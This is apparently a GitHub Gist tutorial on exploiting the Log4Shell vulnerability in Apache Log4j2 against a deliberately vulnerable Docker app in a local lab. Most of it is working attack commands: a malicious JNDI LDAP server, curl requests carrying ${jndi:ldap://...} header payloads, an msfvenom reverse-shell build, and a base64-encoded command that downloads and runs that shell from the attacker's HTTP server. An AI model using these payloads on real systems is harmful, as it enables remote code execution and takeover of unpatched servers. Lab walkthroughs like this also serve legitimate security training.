Created
January 6, 2022 14:32
-
-
Save simrotion13/3ff7133fb5d3c501f6f34b423c4eef94 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Description: Apache Log4j2 versions up to and including 2.14.1 (excluding security release 2.12.2), are vulnerable to a remote code execution vulnerability. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. | |
| Prerequiste | |
| Docker must be install. Go to below link to see how to install docker on kali linux | |
| https://youtu.be/xN2JGqiqgow | |
| Steps | |
| A) Download log4j vulnerable app from below github link | |
| https://github.com/simrotion13/log4shell-vulnerable-app | |
| $ cd log4j | |
| $ https://github.com/simrotion13/log4shell-vulnerable-app | |
| $ sudo docker build . -t vulnerable-app | |
| This will take time.. | |
| # sudo docker run -p 8080:8080 --name vulnerable-app vulnerable-app | |
| Run 'docker ps' command to check status of new docker instance | |
| #sudo docker ps | |
| B) Run malicous LDAP server. I already downloaded it on local machine | |
| #java -jar JNDIExploit-1.2-SNAPSHOT.jar -h | |
| #java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 172.17.0.1 -p 8888 | |
| C) The below is syntax to exploit the vulnerability | |
| curl <vulnerable server ip> -H 'X-Api-Version: ${jndi:ldap://ldapserverip:1389/Basic/Command/Base64/<command in base64>}' | |
| Let's first confirm no file named pwned present in /tmp directory of target machine | |
| sudo docker exec vulnerable-app ls /tmp | |
| D) Run below command which create pwned file in tmp folder on target machine. | |
| curl 172.17.0.2:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZA==}' | |
| Let's try to get Remote Code Execution on target machine. | |
| 1. create a reverse shell file using msfvenom | |
| msfvenom -p linux/x64/shell_reverse_tcp LHOST=172.17.0.1 LPORT=4444 -f elf -o ./rev.elf | |
| 2. prepare local server using python on our attacking machine | |
| sudo python3 -m http.server 8081 | |
| 3. encode below command | |
| wget http://172.17.0.1:8081/rev.elf -O /tmp/rev.elf && chmod +x /tmp/rev.elf && /tmp/rev.elf | |
| This command download rev.elf file from attacker machine to target mahcine under /tmp directory and run it | |
| 4. copy base64 output | |
| d2dldCBodHRwOi8vMTcyLjE3LjAuMTo4MDgxL3Jldi5lbGYgLU8gL3RtcC9yZXYuZWxmICYmIGNobW9kICt4IC90bXAvcmV2LmVsZiAmJiAvdG1wL3Jldi5lbGY= | |
| 5. Run below command | |
| $ curl 172.17.0.2:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/Command/Base64/d2dldCBodHRwOi8vMTcyLjE3LjAuMTo4MDgxL3Jldi5lbGYgLU8gL3RtcC9yZXYuZWxmICYmIGNobW9kICt4IC90bXAvcmV2LmVsZiAmJiAvdG1wL3Jldi5lbGY=}' | |
| We have perform RCE on target machine and we got root access . | |
| Thanks for watching |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment